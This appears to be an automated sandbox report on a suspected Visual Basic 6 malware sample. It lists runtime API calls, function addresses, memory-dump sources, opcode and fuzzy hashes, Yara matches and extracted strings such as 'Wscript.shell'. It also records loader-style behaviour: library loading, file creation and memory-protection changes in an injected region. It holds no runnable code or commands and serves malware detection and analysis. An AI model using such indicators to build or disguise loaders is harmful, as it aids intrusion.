__vbaGenerateBoundsError.MSVBVM60 ref: 00410931
__vbaGenerateBoundsError.MSVBVM60 ref: 00410968
__vbaGenerateBoundsError.MSVBVM60 ref: 0041099F
__vbaGenerateBoundsError.MSVBVM60 ref: 004109D6
__vbaGenerateBoundsError.MSVBVM60 ref: 00410A0D
__vbaGenerateBoundsError.MSVBVM60 ref: 00410A44
__vbaGenerateBoundsError.MSVBVM60 ref: 00410A7B
__vbaGenerateBoundsError.MSVBVM60 ref: 00410AB2
__vbaGenerateBoundsError.MSVBVM60 ref: 00410AE9
__vbaGenerateBoundsError.MSVBVM60 ref: 00410B20
__vbaGenerateBoundsError.MSVBVM60 ref: 00410B57
__vbaGenerateBoundsError.MSVBVM60 ref: 00410B8E
__vbaGenerateBoundsError.MSVBVM60 ref: 00410BC5
__vbaGenerateBoundsError.MSVBVM60 ref: 00410BFC
__vbaGenerateBoundsError.MSVBVM60 ref: 00410C33
__vbaGenerateBoundsError.MSVBVM60 ref: 00410C6A
__vbaGenerateBoundsError.MSVBVM60 ref: 00410CA1
__vbaGenerateBoundsError.MSVBVM60 ref: 00410CD8
__vbaGenerateBoundsError.MSVBVM60 ref: 00410D0F
__vbaGenerateBoundsError.MSVBVM60 ref: 00410D46
__vbaGenerateBoundsError.MSVBVM60 ref: 00410D7D
__vbaAryDestruct.MSVBVM60(00000000,?,00410DDE), ref: 00410DD8

Strings

4-4-4, xrefs: 004101AD
1, xrefs: 00410D6B

Memory Dump Source

Source File: 00000005.00000002.15125554416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.15125531159.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.15125647868.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.15125681349.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$BoundsErrorGenerate$CheckFreeHresult$#545ChkstkConstruct2DestructListNew2
String ID: 1$4-4-4
API String ID: 500800152-725662731
Opcode ID: 2be7f56c62499ea3f45b1053406f9eb40c777809dd6be603cb50c1490847d2fc
Instruction ID: ae7b9fd5c9d8c55e3c704114620e82490c2909e2bfd5d3546ff863c43ef30748
Opcode Fuzzy Hash: 2be7f56c62499ea3f45b1053406f9eb40c777809dd6be603cb50c1490847d2fc
Instruction Fuzzy Hash: B07281B4900228CBDB64DF64C9857ECB7B0BB1A319F2040DAD50D66742CBBA5EC9CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00411684, Relevance: 61.6, APIs: 29, Strings: 6, Instructions: 363COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 004116A2
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004026E0,000006FC), ref: 00411792
__vbaStrCopy.MSVBVM60(00000000,00401218,004026E0,000006FC), ref: 004117C3
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004026E0,00000700,?,?,?), ref: 00411814
__vbaFreeStr.MSVBVM60(?,?,?), ref: 0041183D
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?), ref: 0041187C
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004026E0,00000704,?,?,?,?,?,?), ref: 004118BD
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?), ref: 004118DC
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004026E0,00000708,?,?,?,?,?,?), ref: 00411934
__vbaStrCmp.MSVBVM60(00402A60,00402A60,?,?,?,?,?,?), ref: 00411987
#610.MSVBVM60(?,00402A60,00402A60,?,?,?,?,?,?), ref: 00411998
#552.MSVBVM60(?,?,00000001,?,00402A60,00402A60,?,?,?,?,?,?), ref: 004119A7
__vbaVarMove.MSVBVM60(?,?,00000001,?,00402A60,00402A60,?,?,?,?,?,?), ref: 004119B2
__vbaFreeVar.MSVBVM60(?,?,00000001,?,00402A60,00402A60,?,?,?,?,?,?), ref: 004119BA
__vbaNew2.MSVBVM60(0040293C,00413418,?,?,00000001,?,00402A60,00402A60,?,?,?,?,?,?), ref: 004119D2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040292C,00000014,?,?,?,?,?,?), ref: 00411A34
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402950,00000130,?,?,?,?,?,?), ref: 00411A90
__vbaStrMove.MSVBVM60(?,?,?,?,?,?), ref: 00411ABA
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?), ref: 00411AC2
__vbaFpI4.MSVBVM60(?,?,?,?,?,?), ref: 00411ACD
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004026B0,00000064,?,?,?,?,?,?), ref: 00411AFF
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004026B0,000002B4,?,?,?,?,?,?), ref: 00411B45
_adj_fdiv_m64.MSVBVM60(?,?,?,?,?,?,?,?), ref: 00411B8C
__vbaFpI4.MSVBVM60(?,?,?,?,?,?,?,?), ref: 00411B91
#716.MSVBVM60(?,Wscript.shell,00000000,?,?,?,?,?,?,?,?), ref: 00411BBE
__vbaObjVar.MSVBVM60(?,?,Wscript.shell,00000000,?,?,?,?,?,?,?,?), ref: 00411BC7
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Wscript.shell,00000000,?,?,?,?,?,?,?,?), ref: 00411BD1
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Wscript.shell,00000000,?,?,?,?,?,?,?,?), ref: 00411BD9

Strings

didynamous, xrefs: 0041196A
ANTILLAS, xrefs: 004117BB
Wscript.shell, xrefs: 00411BB5
Skuringers, xrefs: 00411874
>6, xrefs: 00411BE8
h2a, xrefs: 004116E8, 004116EE

Memory Dump Source

Source File: 00000005.00000002.15125554416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.15125531159.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.15125647868.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.15125681349.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$CopyMove$#552#610#716AddrefChkstkNew2_adj_fdiv_m64
String ID: >6$ANTILLAS$Skuringers$Wscript.shell$didynamous$h2a
API String ID: 4221906290-931364018
Opcode ID: 29a4692b382ed47f0323b318a762873d873b8bb17da5fce4d05df86f34629da0
Instruction ID: c10e80fa50684747c2664ecf627648de311d6d7eb707f0e0a06c9753ec8856d7
Opcode Fuzzy Hash: 29a4692b382ed47f0323b318a762873d873b8bb17da5fce4d05df86f34629da0
Instruction Fuzzy Hash: 98F1D374900218EFDB11DFA5CD85BDDBBB4BF08304F1081AAF509BB2A1DB785A948F58

Uniqueness

Uniqueness Score: -1.00%

Function 022F3041, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,022F9264,08D287BE,598BEE16,022F02E3,-0000000226638B60,022F7ABF,00000000,022F027E), ref: 022F8B03

Strings

|N, xrefs: 022F309C
o, xrefs: 022F7F6E

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: o$|N
API String ID: 1029625771-417825382
Opcode ID: 0b19516eb7388109e25e995b97798659b6e9e63e13b18a2b322d900d24f36208
Instruction ID: eb9ae93faf64c41c89f3588d046461003fecccb5af12d92960a7cbfb29874945
Opcode Fuzzy Hash: 0b19516eb7388109e25e995b97798659b6e9e63e13b18a2b322d900d24f36208
Instruction Fuzzy Hash: EA41F3706683859FCBB19FA488957CDFB62AF05B10F51427ADE4CDB219CB748640CB63

Uniqueness

Uniqueness Score: -1.00%

Function 022F89E2, Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,022F9264,08D287BE,598BEE16,022F02E3,-0000000226638B60,022F7ABF,00000000,022F027E), ref: 022F8B03

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5ee67befe5631aafe96481bf6c56f6da6cd836db447631c6acd169363c2eb19c
Instruction ID: 550f7c2f03f4999839738f67f7fd1204cc85683db3668f508bd59af31b38a221
Opcode Fuzzy Hash: 5ee67befe5631aafe96481bf6c56f6da6cd836db447631c6acd169363c2eb19c
Instruction Fuzzy Hash: D2215E706583899FCBB0DF65C8E57C9B6A6AF59B00F81812AEE0DDB214C7348A418B12

Uniqueness

Uniqueness Score: -1.00%

Function 022F826E, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,52B14C47), ref: 022F8463

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 313a4506ef4af26318b6125ea83cab7b6b2932c645e804d8eb64f4b372b4d0ec
Instruction ID: 8d3142783514af9bfdff772cc90d070007cb60565d2613ae4665803e1ee98540
Opcode Fuzzy Hash: 313a4506ef4af26318b6125ea83cab7b6b2932c645e804d8eb64f4b372b4d0ec
Instruction Fuzzy Hash: 3221A231A292C5CFEB588F34C416596FBA0FF42305F49009ED9869F129E7702551CB53

Uniqueness

Uniqueness Score: -1.00%

Function 022F82C2, Relevance: 1.5, APIs: 1, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,52B14C47), ref: 022F8463

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: bf06912099ff516efc23c751878dfb8fb5fc1a8487c228bd0624edf19a947776
Instruction ID: 79b21497a579d3f09e6012d35db0eb16a37f5007c3769eacad498135876dbb6d
Opcode Fuzzy Hash: bf06912099ff516efc23c751878dfb8fb5fc1a8487c228bd0624edf19a947776
Instruction Fuzzy Hash: 92018031A39284CFEBA8CF2098166EAF7A0BF92744F45005ED9869F128D6701650CB93

Uniqueness

Uniqueness Score: -1.00%

Function 022F8A6B, Relevance: 1.5, APIs: 1, Instructions: 37libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,022F9264,08D287BE,598BEE16,022F02E3,-0000000226638B60,022F7ABF,00000000,022F027E), ref: 022F8B03

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 42444f43ec9268b1206b0f7a287f3adf4f002e4c49dcb9f1fcd2a150bd4bc6fd
Instruction ID: 3abc62389362d78d79fb40decdcd3cc3fa47642042fdfda970d59e5a27dd17e1
Opcode Fuzzy Hash: 42444f43ec9268b1206b0f7a287f3adf4f002e4c49dcb9f1fcd2a150bd4bc6fd
Instruction Fuzzy Hash: 9D0192705882888FCBA59F74886A3C9BB71FF42B05F91405BE859AF114D7359640CF43

Uniqueness

Uniqueness Score: -1.00%

Function 022F8366, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,52B14C47), ref: 022F8463

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 85ac3e1cd40e910223d2b21d9280d406e8709ae715721d41f78e0a4486d4fbf8
Instruction ID: beee399d3c6c7ed2731854b4b541146a24ed8307a43a6362c25b56d163daab8a
Opcode Fuzzy Hash: 85ac3e1cd40e910223d2b21d9280d406e8709ae715721d41f78e0a4486d4fbf8
Instruction Fuzzy Hash: BEF0F631E3A184CFDB58CF30881A296FBA0BF83305F45009FD9465F119EA702554CB93

Uniqueness

Uniqueness Score: -1.00%

Function 022F8403, Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,52B14C47), ref: 022F8463

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fc63f2d121fa63f12aba84fac7246007939b397f8166f32f34a909a7e4cf9890
Instruction ID: 3ea18f7f3832c1f5ce6e944108b6ef082b746357ba888a8d9fc47eac087b5fbf
Opcode Fuzzy Hash: fc63f2d121fa63f12aba84fac7246007939b397f8166f32f34a909a7e4cf9890
Instruction Fuzzy Hash: BE01FB3191A284CFEB068F35C85E585BFA0FF83305B1A50CAD4845F52AE7317055CB82

Uniqueness

Uniqueness Score: -1.00%

Function 022F83A7, Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,52B14C47), ref: 022F8463

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c03c5bcce309ccb8a9462eb272bb5254306e9d25e83d687fb0d7089d424fc6f5
Instruction ID: 73bcdacfe4f31e19cd216ae8cce9ba4d1095066060e8b80cfffbc8a347125b09
Opcode Fuzzy Hash: c03c5bcce309ccb8a9462eb272bb5254306e9d25e83d687fb0d7089d424fc6f5
Instruction Fuzzy Hash: 3FF0823092A1C4CFDB25CF3088195C9BBB0FF86304F05009AD8455F119D2706554CB93

Uniqueness

Uniqueness Score: -1.00%

Function 022F83DA, Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,52B14C47), ref: 022F8463

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a28ff1f695db8a3ced124e8d2392fe9292f25d0d7a4e7627a5e2e2441f3899b2
Instruction ID: 80c042034370c38c6c4d6801359e50b8ed49a5929ddc203aff33f52d08261497
Opcode Fuzzy Hash: a28ff1f695db8a3ced124e8d2392fe9292f25d0d7a4e7627a5e2e2441f3899b2
Instruction Fuzzy Hash: 8AE0E531E2A695CFEB25CF21880A585FBA0BF93705F0A00EAD8845F219E6B12554CB92

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 022F9C86, Relevance: 1.9, Strings: 1, Instructions: 604COMMON

Download Yara Rule

Strings

izI, xrefs: 022FA613

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: izI
API String ID: 3389902171-3212114483
Opcode ID: 1ddae20192a356a056b40274414bc391884e99bf35ee51078c300c0401f73dc7
Instruction ID: 6667ae6c0912118a32b44dc7dc4ea03da402a32d46b578f4752d69ec663f58ae
Opcode Fuzzy Hash: 1ddae20192a356a056b40274414bc391884e99bf35ee51078c300c0401f73dc7
Instruction Fuzzy Hash: D43236316183C58FDB71CF78C8987DABBE2AF56310F4981AEC8998F29AD3748545C712

Uniqueness

Uniqueness Score: -1.00%

Function 022FA51B, Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

izI, xrefs: 022FA613

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: izI
API String ID: 0-3212114483
Opcode ID: 3f00e30ea0c813a16ced68af9ae186018db3eacdf18a6f5c568e7f933742d35c
Instruction ID: 95d72d8c232a687c534bd4fe6f6f8c1cec81fb485d95e7ed18eff883605c2bfa
Opcode Fuzzy Hash: 3f00e30ea0c813a16ced68af9ae186018db3eacdf18a6f5c568e7f933742d35c
Instruction Fuzzy Hash: 3A3146709183848FDF658F7488993DABFB1EF52340F4941AECC4A8F29AD7345205CB42

Uniqueness

Uniqueness Score: -1.00%

Function 022F9C6A, Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8513a0ad87d51c0ace1336a844c2cfe4b06fbcf71ffb7aafff8b2af432d93ca8
Instruction ID: ef712502d0cd2b28fbd2d95870d7b04e90157f313960f0090888843832e47a94
Opcode Fuzzy Hash: 8513a0ad87d51c0ace1336a844c2cfe4b06fbcf71ffb7aafff8b2af432d93ca8
Instruction Fuzzy Hash: D6D1E7315583C58FDB61CF38C898BD6BFE2AF56320F0A81AAC8994F297D3758545CB12

Uniqueness

Uniqueness Score: -1.00%

Function 022F9D4E, Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66c91aee1b26f0b9e95d312bc50c98bc33890071fabb5ebce8e271d6695025be
Instruction ID: c589fa4ad2c5cecf79d7fb2cc1e3da13ff9470b897bb0992dee82a689b803bce
Opcode Fuzzy Hash: 66c91aee1b26f0b9e95d312bc50c98bc33890071fabb5ebce8e271d6695025be
Instruction Fuzzy Hash: 6AB1F3215187C58EDB628F38C898BD6BFE26F52320F0E82AAC8994F2D7D3758545C712

Uniqueness

Uniqueness Score: -1.00%

Function 022F9D1F, Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 7d79fb258148e08ade4739f5eed1c93fc8036d28db9f3953a72a8031d59b5751
Instruction ID: ab40d7a6c805d8c4277eeaa59c2afa5d988471353d94ba937b022b8e56b06083
Opcode Fuzzy Hash: 7d79fb258148e08ade4739f5eed1c93fc8036d28db9f3953a72a8031d59b5751
Instruction Fuzzy Hash: 27B1B3315587C58EDB628F38C8987D6BFE26F53320F0A82AAC8994F29BD3758545C712

Uniqueness

Uniqueness Score: -1.00%

Function 022F9E1D, Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d763c0dbc98533deb6e25e5da3808fe3d7f6d3d1c5c29b61409eb66d3eec43
Instruction ID: 85e68b1862d159bb1860c5a53f89709c687590344f0357de21b8f4538e5c9e5c
Opcode Fuzzy Hash: a3d763c0dbc98533deb6e25e5da3808fe3d7f6d3d1c5c29b61409eb66d3eec43
Instruction Fuzzy Hash: C791D5315587C58EDB718F38C898BDABFD2AF52320F1AC1AAC8994F29BD3758145C712

Uniqueness

Uniqueness Score: -1.00%

Function 022F9DE9, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4089bec5a53b5c8cff7da849cd561400ca79ae82747685c577052b5b1b7fbd72
Instruction ID: 3f5e6b84f3cccbf6b4910def92135347da31d4d641c8e5e9b0319125adfad2a9
Opcode Fuzzy Hash: 4089bec5a53b5c8cff7da849cd561400ca79ae82747685c577052b5b1b7fbd72
Instruction Fuzzy Hash: F0A1C3315583C58EDB768F38C899BD6BFE26F52320F0AC1AAC8994F29BD3758145C712

Uniqueness

Uniqueness Score: -1.00%

Function 022F4D43, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4961459971fc87ca4383a3fffdcbb429113422e69bd04e555029fc306d4d048d
Instruction ID: e88df1c7a649edd818808e39a368baf654c37c032f676595673079a1c83fd6bf
Opcode Fuzzy Hash: 4961459971fc87ca4383a3fffdcbb429113422e69bd04e555029fc306d4d048d
Instruction Fuzzy Hash: F4814472624345CFD774CE29C9903EAB7E2AF98700F94412ECA8D9FA09D331A646CB41

Uniqueness

Uniqueness Score: -1.00%

Function 022F3231, Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de5ffcedae63dbf67c319175c8053b3d540272b826a661713d51f8be1224982c
Instruction ID: a8119aa7b1a2cf2a3aa3826471278fa570e43c40805248c2639d0d65fc0e2785
Opcode Fuzzy Hash: de5ffcedae63dbf67c319175c8053b3d540272b826a661713d51f8be1224982c
Instruction Fuzzy Hash: A48105716143889FDB74DE64CD55BEBBBA2EF48340F45842EEC89AB215D3709A41CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0040954B, Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15125554416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.15125531159.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.15125647868.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.15125681349.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faade40bf9847df52eff550d9dd153931259dfdaf3e38247be8cc288bc070c6d
Instruction ID: 7825f6a28de29a1c67eda70a8b71eb693c022e7578d7dfe45ec93b0ca082dd00
Opcode Fuzzy Hash: faade40bf9847df52eff550d9dd153931259dfdaf3e38247be8cc288bc070c6d
Instruction Fuzzy Hash: A071E0764093D09FCB178F38C8A96857FB0FF1B21432909DEC4818F262E736A852DB52

Uniqueness

Uniqueness Score: -1.00%

Function 022F9E96, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92ba8b3e75573b2590cfad957a3a64ede72dee69ab3e0df953b076207305ffe8
Instruction ID: 7adae336f5a9f0314cde450726d00c3fb6d336736b5ac18355c857747ca660eb
Opcode Fuzzy Hash: 92ba8b3e75573b2590cfad957a3a64ede72dee69ab3e0df953b076207305ffe8
Instruction Fuzzy Hash: F88109315583C58FCB758F388C957DABFE2AF52310F0981AEC8994F29AD7719145C712

Uniqueness

Uniqueness Score: -1.00%

Function 022F9EDB, Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13dad1c100cc7cfc9789702bd40f5e09468145177c5b9bc5b54715ba0b422285
Instruction ID: cc91c28ee6144b199f9cba0493bd695f3849632bf6300cb6018d91e68ef2117e
Opcode Fuzzy Hash: 13dad1c100cc7cfc9789702bd40f5e09468145177c5b9bc5b54715ba0b422285
Instruction Fuzzy Hash: 4B71F9715583C58FCF758F288C947EABFA2AF52310F1981BAC89A4F28AD3714545CB12

Uniqueness

Uniqueness Score: -1.00%

Function 022F9EEC, Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1471aaff4f0050abd3377d6270ccd3c461f10da82c45c72c38dce9ea0a91c0a
Instruction ID: 90fa40dcad73e75991d8718316cc6c402b273fad779ce13786877e7cbe7551d3
Opcode Fuzzy Hash: e1471aaff4f0050abd3377d6270ccd3c461f10da82c45c72c38dce9ea0a91c0a
Instruction Fuzzy Hash: 78712A315583C68FCF758F388C947EABFA2AF52320F0981BAC8994F28AC3714545C752

Uniqueness

Uniqueness Score: -1.00%

Function 022F6134, Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75074051def7ce6ad2ec8aa33c8809b7bbcb43f965277816f8bf83b3a58687ba
Instruction ID: db2fd909c5d87e0912f26c837d8c2eaa0fb42f5e8ef455aebc2ee56a390d4135
Opcode Fuzzy Hash: 75074051def7ce6ad2ec8aa33c8809b7bbcb43f965277816f8bf83b3a58687ba
Instruction Fuzzy Hash: D4516632115388DFCBA28F74CC84AC9BFB2FF46710F1545A9E6984B126D7319A56CF41

Uniqueness

Uniqueness Score: -1.00%

Function 022F9F03, Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4af46dbbd58845e3d104325c5c529725d299079d21b8a6a23ba206496514c1d0
Instruction ID: 7cd62233a2bab70cceef11dfd3428cc3b4a45733af77bcc4c05170a4637faf92
Opcode Fuzzy Hash: 4af46dbbd58845e3d104325c5c529725d299079d21b8a6a23ba206496514c1d0
Instruction Fuzzy Hash: 8571FA315583C58FCF758F288C957EABBE2AF52310F19817AC8998F28AD3758545CB11

Uniqueness

Uniqueness Score: -1.00%

Function 022F328A, Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba0e6fa48c32b10a1b71d15c1e4ff90bf14b9172308247ec859546d2b164c738
Instruction ID: 4be85aef413bcfa8210ba6ce81f88b3fe71fdf1dc2133a32c17d04405b2398ba
Opcode Fuzzy Hash: ba0e6fa48c32b10a1b71d15c1e4ff90bf14b9172308247ec859546d2b164c738
Instruction Fuzzy Hash: EC6104716183889FCB74CE74CD55BEABBA2FF48340F45442EEC89AB215D7705A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 022F6E49, Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f37956904ea0e5263ff3fec7a94916320d7eeddb560f94cc82549b32a9b106
Instruction ID: d0853905a48a8b9b5aea4bab99bb5e6a272c311a0232e8b0544314b6c7cae0be
Opcode Fuzzy Hash: d1f37956904ea0e5263ff3fec7a94916320d7eeddb560f94cc82549b32a9b106
Instruction Fuzzy Hash: 7E5157321693C99FCB6A8F75C859AD9BFB1FF03300F0809AEC6958B526E731554ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 022F9F6E, Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2f7b87925093e358a4359d3bc79cab3da84f81afb0abe0ae787fd1a211ad34b
Instruction ID: 24078300bceaa62aacf2f0bd0958723db559bdb672fe454680451c85a63c5168
Opcode Fuzzy Hash: d2f7b87925093e358a4359d3bc79cab3da84f81afb0abe0ae787fd1a211ad34b
Instruction Fuzzy Hash: E061E8315583C58FCF758F388C957DAFBA2AF52310F0A81AEC8994F29AD3754145CB12

Uniqueness

Uniqueness Score: -1.00%

Function 022F61D1, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae50ac92ef817c2138ef0c1c04a96e0e381698e35774374ec1bdd16d6c8d38dc
Instruction ID: 098cc2fcd1a8a0782c8721e4f66c4fe404623adcc5fb244608ca31c4340055a8
Opcode Fuzzy Hash: ae50ac92ef817c2138ef0c1c04a96e0e381698e35774374ec1bdd16d6c8d38dc
Instruction Fuzzy Hash: EB517436214384DFCB568F74CC8AAC9BFB2FF42700F0540A9E5944B125E732951ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 022F3346, Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0e93c0c1babfe828f5a15695af0053800227ff6671d9e99f11f743bca0b09f4
Instruction ID: 489fc1c2e7c632c4e330fb096f4ec4f06c99d51ed3a432ee499df603e2900023
Opcode Fuzzy Hash: b0e93c0c1babfe828f5a15695af0053800227ff6671d9e99f11f743bca0b09f4
